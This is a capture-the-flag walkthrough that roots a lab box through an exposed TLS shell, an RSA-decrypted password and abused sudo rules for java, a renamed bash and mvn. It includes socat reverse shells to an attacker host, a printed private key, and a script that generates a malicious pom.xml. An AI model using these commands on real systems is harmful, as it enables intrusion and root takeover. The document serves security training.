Information gathering
```cmd
rustscan -a 192.168.31.135 --ulimit 5000 -- -sV -sC
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "C:\\Users\\Administrator\\.rustscan.toml"
Open 192.168.31.135:22
Open 192.168.31.135:80
Open 192.168.31.135:55555
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC" on ip 192.168.31.135
Depending on the complexity of the script, results may take some time to appear.

[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-05-01 17:47 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:47
Completed NSE at 17:47, 0.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:47
Completed NSE at 17:47, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:47
Completed NSE at 17:47, 0.00s elapsed
Initiating ARP Ping Scan at 17:47
Scanning 192.168.31.135 [1 port]
Completed ARP Ping Scan at 17:47, 1.42s elapsed (1 total hosts)
Nmap scan report for 192.168.31.135 [host down, received no-response]
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:47
Completed NSE at 17:47, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:47
Completed NSE at 17:47, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:47
Completed NSE at 17:47, 0.00s elapsed
Read data files from: D:\Nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.26 seconds
           Raw packets sent: 2 (56B) | Rcvd: 0 (0B)
```

RustScan finds 22, 80 and 55555 open. The nmap service scan it hands off to reports the host as down: it was run from a Windows host and got no reply to its ARP ping, so `-sV -sC` never ran (nmap itself suggests `-Pn`). Port 55555 turns out to be a directly exposed TLS shell: connecting with `openssl s_client` lands in a shell that is already running as mav1234, with no authentication of any kind.
```bash
┌──(root㉿kali)-[~]
└─# openssl s_client -quiet -connect $IP:55555 2>/dev/null
sh-5.2$ id
id
uid=1000(mav1234) gid=1000(mav1234) groups=1000(mav1234)
sh-5.2$ ls
ls
journel  user.txt
sh-5.2$ cat user.txt
cat user.txt
flag{user-f823e147843dd5b23f0ac9d243ae12fb}
sh-5.2$
```

(Each command is echoed back once because the remote shell has no PTY; `-quiet` just suppresses the handshake chatter.)

Lateral movement to qc2000
Read the other file in the current directory.
```bash
sh-5.2$ cat journel
I’ve encrypted my secret with my key. No one else can read it now. It’s safely hidden away:)
```

Check set-uid / set-gid files.
```bash
sh-5.2$ find / -perm -4000 -o -perm -2000 2>/dev/null
/home/mav1234/.local
/bin/bbsuid
/usr/bin/expiry
/usr/bin/chsh
/usr/bin/chage
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/chfn
/usr/sbin/unix_chkpwd
/usr/sbin/suexec
/var/lib/caddy
/var/log/apache2
```

Besides the usual set-uid binaries (and `/bin/bbsuid`, the busybox set-uid helper on Alpine), the listing surfaces the hidden directory /home/mav1234/.local. It matched because it is set-gid (`drwxr-sr-x`, as the next `ls -la` shows), the same reason the two `/var` directories appear: without parentheses around the two `-perm` tests the implicit `-print` applies to both branches, and nothing restricts the match to regular files. `find / \( -perm -4000 -o -perm -2000 \) -type f` would give only the binaries, but here the directory is the interesting hit.
```bash
sh-5.2$ ls -la
total 20
drwxr-sr-x 2 mav1234 mav1234 4096 Feb 26 15:48 .
drwx------ 4 mav1234 mav1234 4096 May  1 21:25 ..
-rw-r--r-- 1 mav1234 mav1234  512 Feb 26 15:48 maven.meta
-rw------- 1 mav1234 mav1234 5285 Feb 26 15:20 ssl.pem
```

(Run from inside /home/mav1234/.local.) journel says a secret was encrypted with a key, so the working assumption is that ssl.pem is the key and maven.meta the ciphertext. maven.meta being exactly 512 bytes fits that: it is the size of a single RSA-4096 block.
```bash
sh-5.2$ cat /home/mav1234/.local/ssl.pem
-----BEGIN PRIVATE KEY-----
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
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFoTCCA4mgAwIBAgIUVLyuh/l5EdN2c47Y0L//ePAO7GYwDQYJKoZIhvcNAQELBQAwYDELMAkGA1UEBhMCVVMxDjAMBgNVBAgMBVN0YXRlMQ0wCwYDVQQHDARDaXR5MQ4wDAYDVQQKDAVNYXZlbjEOMAwGA1UECwwFUHJveHkxEjAQBgNVBAMMCWxvY2FsaG9zdDAeFw0yNjAyMjYwNzIwNDhaFw0zNjAyMjQwNzIwNDhaMGAxCzAJBgNVBAYTAlVTMQ4wDAYDVQQIDAVTdGF0ZTENMAsGA1UEBwwEQ2l0eTEOMAwGA1UECgwFTWF2ZW4xDjAMBgNVBAsMBVByb3h5MRIwEAYDVQQDDAlsb2NhbGhvc3QwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDylEQQUsAPSo6YTElEnKXxIQ6utctm6EVM
[... rest of the certificate body cut off in the original capture ...]
-----END CERTIFICATE-----
```

ssl.pem holds a PKCS#8 RSA-4096 private key followed by a certificate. Decoding the DN fields of that certificate, Subject and Issuer are the same (C=US, ST=State, L=City, O=Maven, OU=Proxy, CN=localhost), i.e. it is self-signed, and the O=Maven / OU=Proxy naming echoes the maven.meta file name. The public-key prefix inside the certificate (`AoICAQDylEQQUsAPSo6Y...`) is the same modulus as in the private key block, so the two halves of the file belong together.
```bash
sh-5.2$ openssl pkeyutl -decrypt -inkey /home/mav1234/.local/ssl.pem -in /home/mav1234/.local/maven.meta 2>&1
MvxPf8yCB8lxXk5A
```

`pkeyutl -decrypt` uses PKCS#1 v1.5 padding unless told otherwise, and that is what this blob was produced with, so the 512-byte ciphertext decrypts cleanly. The plaintext, MvxPf8yCB8lxXk5A, is mav1234's password (the sudo prompt below accepts it).
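The checks a practitioner would run before (and around) that `pkeyutl` call, as an added example that is not part of the original writeup: who the bundled certificate belongs to, whether the blob is exactly one RSA block for this key, and which padding it was encrypted with. It assumes only that `openssl` is on PATH; the file names are arguments and nothing from the box is hard-coded.

```shell
#!/bin/sh
# Added example, not from the original writeup. Given a PEM bundle (RSA private
# key, optionally followed by its certificate) and a ciphertext file, show who
# the certificate belongs to, confirm the blob is a single raw RSA block for
# that key, then try the two paddings pkeyutl understands.
set -u

# cert_subject_issuer BUNDLE: subject/issuer of the first CERTIFICATE block
cert_subject_issuer() {
    openssl x509 -in "$1" -noout -subject -issuer 2>/dev/null
}

# cert_fingerprint BUNDLE: SHA-256 fingerprint (AA:BB:...), handy for comparing
# against what a TLS listener actually presents
cert_fingerprint() {
    openssl x509 -in "$1" -noout -fingerprint -sha256 2>/dev/null | sed 's/^.*=//'
}

# rsa_key_bytes KEY: modulus size in bytes of the RSA private key in KEY
rsa_key_bytes() {
    bits=$(openssl pkey -in "$1" -noout -text 2>/dev/null |
           sed -n 's/.*(\([0-9][0-9]*\) bit.*/\1/p' | head -n 1)
    [ -n "$bits" ] || return 1
    echo $((bits / 8))
}

# rsa_try_decrypt KEY BLOB: print "<padding>: <plaintext>" on success.
# Exit codes: 2 no usable key, 3 wrong ciphertext size, 4 no padding fits.
rsa_try_decrypt() {
    key=$1; blob=$2
    n=$(rsa_key_bytes "$key") || { echo "no RSA private key in $key" >&2; return 2; }
    size=$(wc -c < "$blob" | tr -d ' ')
    if [ "$size" -ne "$n" ]; then
        echo "$blob is $size bytes but the modulus is $n bytes: not a single RSA block" >&2
        return 3
    fi
    # OAEP first: it carries an integrity check, so a wrong guess fails cleanly.
    # PKCS#1 v1.5 goes last because OpenSSL 3.2+ answers bad v1.5 padding with
    # deterministic garbage (implicit rejection) instead of an error, which
    # would otherwise mask an OAEP ciphertext.
    for pad in oaep pkcs1; do
        if out=$(openssl pkeyutl -decrypt -inkey "$key" -in "$blob" \
                     -pkeyopt rsa_padding_mode:$pad 2>/dev/null); then
            echo "$pad: $out"
            return 0
        fi
    done
    echo "neither OAEP nor PKCS#1 v1.5 decrypted $blob with $key" >&2
    return 4
}

# Stand-alone use: sh rsa_check.sh ssl.pem maven.meta
if [ $# -ge 2 ]; then
    cert_subject_issuer "$1"
    rsa_try_decrypt "$1" "$2"
fi
```

`cert_fingerprint ssl.pem` can be compared with the certificate the 55555 listener presents (`openssl s_client -connect $IP:55555 </dev/null 2>/dev/null | openssl x509 -noout -fingerprint -sha256`) to confirm that the key file is the one behind that TLS shell; the writeup does not do this, so treat it as a suggested check rather than an established fact about the box.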
```bash
sh-5.2$ sudo -l
[sudo] password for mav1234:
Matching Defaults entries for mav1234 on Pom:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for mav1234:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User mav1234 may run the following commands on Pom:
    (qc2000) PASSWD: /usr/bin/java
```

mav1234 may run /usr/bin/java as qc2000 (the rule is PASSWD, so the recovered password is what makes it usable). Java can execute arbitrary system commands, so that rule is enough to get a shell as qc2000.
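Three `sudo -l` listings are read by eye in this writeup (this one and the ones for qc2000 and terra536 further down). The following is an added example, not part of the original writeup, that turns such output into one rule per line and picks out the rules worth chasing: no password, a target living in a home or temp directory, or an interpreter/build tool. The sample text is constructed, modelled on the listings on this page, and the set of "risky" program names is an assumption to tune.

```shell
#!/bin/sh
# Added example, not part of the original writeup: parse `sudo -l` output into
# runas|PASSWD-or-NOPASSWD|command lines and flag the rules worth a second look.
# Feed real output with:  sudo -l 2>/dev/null | risky_sudo_rules
# The sample below is constructed, modelled on the listings in this writeup.
SAMPLE_SUDO_L='Matching Defaults entries for mav1234 on Pom:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for mav1234:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User mav1234 may run the following commands on Pom:
    (qc2000) PASSWD: /usr/bin/java
    (terra536) NOPASSWD: /home/terra536/ln
    (ALL) NOPASSWD: /usr/bin/mvn
    (root : root) /usr/bin/less /var/log/messages, /usr/bin/cat /etc/hosts'

# sudo_rules: stdin = sudo -l output; stdout = runas|PASSWD|command per rule
sudo_rules() {
    awk -v OFS='|' '
        # Only command lines start with a parenthesised runas spec such as
        # "(qc2000)" or "(root : root)"; Defaults lines never do.
        match($0, /^[ \t]*\([^)]*\)/) {
            runas = $0
            sub(/^[ \t]*\(/, "", runas); sub(/\).*$/, "", runas)
            rest = substr($0, RSTART + RLENGTH)
            sub(/^[ \t]+/, "", rest)
            # A missing tag means the sudo default: a password is required.
            pw = "PASSWD"
            if (sub(/^NOPASSWD:[ \t]*/, "", rest)) pw = "NOPASSWD"
            else sub(/^PASSWD:[ \t]*/, "", rest)
            # Several commands may share one line, separated by commas.
            n = split(rest, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) print runas, pw, cmds[i]
        }'
}

# risky_sudo_rules: the subset worth chasing. Which program names count as
# "can run anything" is an assumption; extend the list for your environment.
risky_sudo_rules() {
    sudo_rules | awk -F'|' '
        $2 == "NOPASSWD" ||
        $3 ~ /^\/(home|tmp|dev\/shm)\// ||
        $3 ~ /\/(java|mvn|bash|sh|python[0-9.]*|perl|ruby|node|make|gcc)( |$)/ { print }'
}

# Stand-alone run against the constructed sample.
printf '%s\n' "$SAMPLE_SUDO_L" | risky_sudo_rules
```

On the sample the risky set is exactly the three rules this writeup abuses: java as qc2000 (an interpreter), the binary inside terra536's home, and mvn as root without a password; the `less`/`cat` rule stays out because it is password-gated, lives in /usr/bin and is not an interpreter.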
Move laterally to qc2000 through Java, using socat for a PTY reverse shell.
```bash
sh-5.2$ cat > /tmp/Rev.java << 'EOF'
public class Rev {
    public static void main(String[] args) throws Exception {
        // Run socat under /bin/sh -c so the comma-separated exec options reach it verbatim.
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c",
            "socat tcp:192.168.31.58:4444 exec:/bin/sh,pty,stderr,setsid,sigint,sane"});
        p.waitFor();
    }
}
EOF
sh-5.2$ sudo -u qc2000 /usr/bin/java /tmp/Rev.java
```

`java /tmp/Rev.java` runs the source file directly (single-file source launch, available since JDK 11), so no javac step is needed. On the attacker side a socat listener with the local TTY in raw mode gives a usable PTY:

```bash
┌──(root㉿kali)-[~]
└─# socat file:`tty`,raw,echo=0 tcp-listen:4444
sh-5.2$ id
uid=1001(qc2000) gid=1001(qc2000) groups=1001(qc2000)
```

Lateral movement to terra536
```bash
sh-5.2$ sudo -l
Matching Defaults entries for qc2000 on Pom:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for qc2000:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User qc2000 may run the following commands on Pom:
    (terra536) NOPASSWD: /home/terra536/ln
```

qc2000 may run /home/terra536/ln as terra536 without a password. A sudo target inside the run-as user's own home directory is suspect whatever it is, so first find out what this `ln` actually is:
```bash
sh-5.2$ sudo -u terra536 /home/terra536/ln --help 2>&1
GNU bash, version 5.2.37(1)-release (x86_64-alpine-linux-musl)
Usage:  /home/terra536/ln [GNU long option] [option] ...
        /home/terra536/ln [GNU long option] [option] script-file ...
GNU long options:
        --debug
        --debugger
        --dump-po-strings
        --dump-strings
        --help
        --init-file
        --login
        --noediting
        --noprofile
        --norc
        --posix
        --pretty-print
        --rcfile
        --restricted
        --verbose
        --version
Shell options:
        -ilrsD or -c command or -O shopt_option         (invocation only)
        -abefhkmnptuvxBCEHPT or -o option
Type `/home/terra536/ln -c "help set"' for more information about shell options.
Type `/home/terra536/ln -c help' for more information about shell builtin commands.
Use the `bashbug' command to report bugs.

bash home page: <http://www.gnu.org/software/bash>
General help using GNU software: <http://www.gnu.org/gethelp/>
```

Despite its name, /home/terra536/ln identifies itself as GNU bash 5.2.37, so `sudo -u terra536 /home/terra536/ln -c '...'` runs arbitrary commands as terra536.
Use socat to pop a shell as terra536.
```bash
sh-5.2$ sudo -u terra536 /home/terra536/ln -c "socat tcp:192.168.31.58:4445 exec:/bin/sh,pty,stderr,setsid,sigint,sane"
```

```bash
┌──(root㉿kali)-[~]
└─# socat file:`tty`,raw,echo=0 tcp-listen:4445
sh-5.2$ id
uid=1002(terra536) gid=1002(terra536) groups=1002(terra536)
```

Privilege escalation
```bash
sh-5.2$ sudo -l
Matching Defaults entries for terra536 on Pom:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for terra536:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User terra536 may run the following commands on Pom:
    (ALL) NOPASSWD: /usr/bin/mvn
```

terra536 may run /usr/bin/mvn as root without a password. Maven executes whatever plugins the project in the current directory declares, and exec-maven-plugin can launch any executable, so this rule is effectively root. Try it with the `exec:exec` goal:
```bash
sh-5.2$ sudo /usr/bin/mvn -q exec:exec -Dexec.executable=/bin/sh -Dexec.args="-c 'socat tcp:192.168.31.58:4446 exec:/bin/sh,pty,stderr,setsid,sigint,sane'"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.6.3:exec (default-cli): Goal requires a project to execute but there is no POM in this directory (/home/mav1234/.local). Please verify you invoked Maven from the correct directory. -> [Help 1]
[ERROR]
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR]
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MissingProjectException
```

The goal fails: `exec:exec` requires a project, i.e. a pom.xml in the working directory, which is still /home/mav1234/.local (inherited through the chain of shells). Note that the plugin itself was resolved fine (the error is raised by exec-maven-plugin 3.6.3), so only the POM is missing.
```bash
sh-5.2$ cd /dev/shm
sh-5.2$ cat > pom.xml << 'EOF'
<project>
  <modelVersion>4.0.0</modelVersion>
  <groupId>exploit</groupId>
  <artifactId>exploit</artifactId>
  <version>1</version>
</project>
EOF
sh-5.2$ sudo /usr/bin/mvn -q exec:exec -Dexec.executable=/bin/sh -Dexec.args="-c 'socat tcp:192.168.31.58:4446 exec:/bin/sh,pty,stderr,setsid,sigint,sane'"
```

A minimal POM in a writable directory is all Maven needs; the listener on 4446 then receives a root shell:

```bash
┌──(root㉿kali)-[~]
└─# socat file:`tty`,raw,echo=0 tcp-listen:4446
sh-5.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
sh-5.2# cat /root/root.txt
flag{root-4a29b2f65b40052a804c0cc4afb906bd}
```
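The pom.xml step above, generalised as an added example that is not part of the original writeup. Instead of passing the executable on the command line, it binds exec-maven-plugin's `exec` goal to the `validate` phase inside the POM, so a bare `sudo mvn -q validate` in that directory runs the command as root. That is the defensive lesson of this rule: restricting mvn's arguments in sudoers would change nothing, because the pom.xml (and `.mvn/maven.config` / `.mvn/jvm.config` under the project directory) decide what Maven runs. Assumptions: the plugin version the box reported (3.6.3) is resolvable from the local repository or the network, and the listener address in the usage line is the writeup's.

```shell
#!/bin/sh
# Added example, not from the original writeup. write_exec_pom DIR CMD writes
# DIR/pom.xml with exec-maven-plugin bound to the validate phase, so that
# `mvn -q validate` (here: under sudo) runs CMD through /bin/sh -c with no
# -D flags on the command line. Assumption: plugin version 3.6.3 (the one the
# box reported) can be resolved; change it if your target has another cached.
set -u

write_exec_pom() {
    dir=$1; cmd=$2
    # Escape the XML specials a shell one-liner commonly contains.
    esc=$(printf '%s' "$cmd" | sed 's/&/\&amp;/g; s/</\&lt;/g; s/>/\&gt;/g')
    cat > "$dir/pom.xml" <<EOF
<project>
  <modelVersion>4.0.0</modelVersion>
  <groupId>example</groupId>
  <artifactId>exec-on-validate</artifactId>
  <version>1</version>
  <build>
    <plugins>
      <plugin>
        <groupId>org.codehaus.mojo</groupId>
        <artifactId>exec-maven-plugin</artifactId>
        <version>3.6.3</version>
        <executions>
          <execution>
            <phase>validate</phase>
            <goals><goal>exec</goal></goals>
            <configuration>
              <executable>/bin/sh</executable>
              <arguments>
                <argument>-c</argument>
                <argument>$esc</argument>
              </arguments>
            </configuration>
          </execution>
        </executions>
      </plugin>
    </plugins>
  </build>
</project>
EOF
    echo "$dir/pom.xml"
}

# Usage on the target, as terra536 (listener and address as in the writeup):
#   d=$(mktemp -d) && write_exec_pom "$d" \
#     'socat tcp:192.168.31.58:4446 exec:/bin/sh,pty,stderr,setsid,sigint,sane' \
#     && cd "$d" && sudo /usr/bin/mvn -q validate
if [ $# -ge 2 ]; then
    write_exec_pom "$1" "$2"
fi
```

`validate` is the first phase of the default lifecycle, so the command runs before Maven looks for sources or dependencies; any later phase (or `mvn package`, if that is all sudoers allowed) would reach it just the same.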